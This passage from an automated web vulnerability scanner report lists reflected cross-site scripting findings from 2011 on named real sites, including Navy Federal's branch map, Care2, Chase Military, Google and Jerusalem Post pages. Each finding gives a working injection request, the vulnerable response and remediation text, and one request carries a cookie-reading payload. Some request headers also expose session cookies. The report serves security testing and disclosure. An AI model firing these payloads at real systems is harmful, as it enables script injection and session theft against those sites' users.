Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:06:16 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='9'; var myaddress=''; var mystate=''; var mycity='9a923</script><script>alert(1)</script>09ca345e6cd'; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(12 ...[SNIP]...
The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='96a6fe</script><script>alert(1)</script>c091167078b'; var myaddress=''; var mystate=''; var mycity=''; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt( ...[SNIP]...
The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:50 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='3'; var myaddress=''; var mystate=''; var mycity=''; var myzip='17a84</script><script>alert(1)</script>6bbb498c306'; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(8); var maptype ...[SNIP]...
The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script t ...[SNIP]... '; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8); var maptype = ''; var mapwidth= '552'; var mapheight= '500'; var zoomfirst = ''; var myversion = 'v53'; var dedupeList = 'navy'; var drivingDir = ''; var noOriginPoint = ''; var disclaimer = ''; var ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:07:40 GMT Server: Apache/2.2.8 Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 76015
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78" s.server="www.care2.com" s.channel="Greenliving" s.pageType="" s.prop3="Greenliving" s.prop16="Unregistered" s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script> ...[SNIP]...
3.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... -1555312', 'mouseover', function(){memberRollover.mem(this);;}); new CARE2.prime.PillManager('d9a3e6ff-1'); function onFacebookConnect() { var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form"; C2FBConnect.onConnect(pg); } FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm"); if($('newCommentForm')) {
var theForm = $('newCommentForm').getElementsB ...[SNIP]...
3.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <script type="text/javascript">
function loadCommentPage(page, numPerPage, itemID) { var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1'; var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?"; var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;
...[SNIP]...
3.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" /> ...[SNIP]...
3.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chasemilitary.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8517f";alert(1)//55b2694a95c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/ Cache-Control: private Content-Length: 68609 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly Date: Wed, 02 Feb 2011 22:16:44 GMT Connection: close
The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68621 Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 01:06:45 GMT Connection: close
3.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chasemilitary.com
Path:
/Default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8d08";alert(1)//c9371ab82a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1 Host: www.chasemilitary.com Proxy-Connection: keep-alive Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68609 Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 00:07:27 GMT
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bdade(a)d80aea01345 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:09 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
3.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.google.com
Path:
/advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:08:40 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:14 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:05 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:11:25 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
3.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.invisionpower.com
Path:
/products/board/features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- ?95e51--><a>1fddadebe75=1 --> ...[SNIP]...
3.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.invisionpower.com
Path:
/products/nexus/features/store.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- store?5e722--><a>6ccf7c9b600=1 --> ...[SNIP]...
3.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jpost.com
Path:
/ArtsAndCulture/FoodAndWine/Article.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1 Host: www.jpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly Content-Type: text/html; charset=utf-8 Content-Length: 117507 Accept-Ranges: bytes Cache-Control: private, max-age=420 Age: 0 Expires: Thu, 03 Feb 2011 01:24:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id="ctl00_He ...[SNIP]... <iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&layout=button_count&show_faces=true&width=150&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h ...[SNIP]...
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
